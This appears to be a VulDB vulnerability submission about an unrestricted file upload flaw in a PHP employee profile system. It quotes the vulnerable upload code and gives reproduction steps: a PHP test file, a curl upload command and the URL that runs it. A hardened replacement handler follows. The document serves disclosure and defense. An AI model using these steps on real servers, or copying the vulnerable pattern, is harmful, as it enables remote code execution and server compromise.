Submission #699247: code-projects Employee Profile Management System published November 15, 2025 Unrestricted Upload (Info)

Title: code-projects Employee Profile Management System published November 15, 2025 Unrestricted Upload
Description:

Summary

The vulnerability exists in the file upload component (Profiling/add_file_query.php) due to missing validation of uploaded file types and content. The application allows arbitrary files, including executable .php files, to be uploaded into a web-accessible directory.

Root Cause

The server stores uploaded files directly under Profiling/uploads/ using the original filename from the client:

    $target_dir = "uploads/";
    $target_file = $target_dir . basename($_FILES["per_file"]["name"]);
    move_uploaded_file($_FILES["per_file"]["tmp_name"], $target_file);

There is no extension restriction, no MIME check, no content inspection, no filename randomization, and the upload directory is inside the web root. A user can therefore upload a PHP file that the server later executes.

Reproduction

Log in as a normal user who has access to the "Add File" feature.

Upload the following file as shell.php:

    <?php echo "EXECUTED: " . __FILE__; ?>

Send the upload request (example using curl):

    curl -X POST "http://localhost/Profiling/add_file_query.php" \
      -F "per_name=1" \
      -F "per_file=@shell.php" \
      -F "upload=Save"

Access the uploaded file directly:

    http://localhost/Profiling/uploads/shell.php

The PHP code executes and prints the message, confirming arbitrary code execution.

Impact

This allows remote attackers to upload and execute arbitrary PHP code on the server. Successful exploitation leads to full server compromise, including command execution, data theft, privilege escalation, and persistent backdoor installation.
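For contrast with the vulnerable handler quoted in the root cause above, here is a hardened upload routine that closes each of the listed gaps: an extension allowlist, content sniffing instead of trusting the client's MIME header, a server-generated random filename, a size limit, and storage outside the web root with non-executable permissions. This is added illustrative code, not code from the project; the field name per_file comes from the report, while the private_uploads directory, the allowlist, the size limit and the JSON response shape are assumptions.

```php
<?php
// Hardened replacement for the upload handler described in the report.
// Illustrative code, not the project's own: "per_file" is the report's field name;
// UPLOAD_DIR, MAX_BYTES, ALLOWED and the response format are assumptions.

declare(strict_types=1);

// Store outside the web root so an uploaded file can never be requested (and executed) by URL.
const UPLOAD_DIR = __DIR__ . '/../private_uploads';
const MAX_BYTES  = 5 * 1024 * 1024;

// Allowlist: extension => MIME types accepted for it, verified from file content.
const ALLOWED = [
    'pdf'  => ['application/pdf'],
    'png'  => ['image/png'],
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
];

function handle_upload(array $file): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return ['ok' => false, 'reason' => 'upload error'];
    }
    // Reject anything that did not arrive through PHP's upload mechanism.
    if (!is_uploaded_file($file['tmp_name'])) {
        return ['ok' => false, 'reason' => 'not an uploaded file'];
    }
    if ($file['size'] > MAX_BYTES) {
        return ['ok' => false, 'reason' => 'too large'];
    }

    // The client-supplied name is used only to select an allowlist entry, never as a path.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return ['ok' => false, 'reason' => 'extension not allowed'];
    }

    // Sniff the real content type; $_FILES[...]['type'] is attacker-controlled and ignored.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED[$ext], true)) {
        return ['ok' => false, 'reason' => 'content does not match extension'];
    }

    // Random server-generated name: no traversal, no double extensions, no attacker control.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = UPLOAD_DIR . '/' . $stored;

    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0750, true)) {
        return ['ok' => false, 'reason' => 'storage unavailable'];
    }
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return ['ok' => false, 'reason' => 'move failed'];
    }
    chmod($dest, 0640); // never executable

    // Keep the original name only as display metadata (e.g. in the database).
    return [
        'ok'            => true,
        'stored_name'   => $stored,
        'original_name' => basename($file['name']),
    ];
}

if (isset($_FILES['per_file'])) {
    $result = handle_upload($_FILES['per_file']);
    http_response_code($result['ok'] ? 200 : 400);
    header('Content-Type: application/json');
    echo json_encode($result);
}
```

With this handler, the shell.php upload from the reproduction is rejected at the extension check, and a PHP payload renamed to an allowed extension is rejected because finfo reports text/x-php rather than the allowlisted type. Because files live outside the document root, they must be served through a download script that looks up the stored name and sends it with Content-Disposition: attachment and X-Content-Type-Options: nosniff; if the deployment cannot move the directory out of the web root, the web server must additionally be configured to refuse script execution under uploads/ (for Apache, a php_flag engine off or a handler removal in that directory's configuration).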
Source: https://github.com/shenxianyuguitian/employee-management-UFU
User: xuanyuesanshi (UID 88126)
Submitted: 2025-11-21 08:26 AM (5 months ago)
Moderation: 2025-12-06 06:22 PM (15 days later)
Status: Accepted
VulDB entry: 334615 [code-projects Employee Profile Management System 1.0 add_file_query.php per_file privilege escalation]
Points: 20
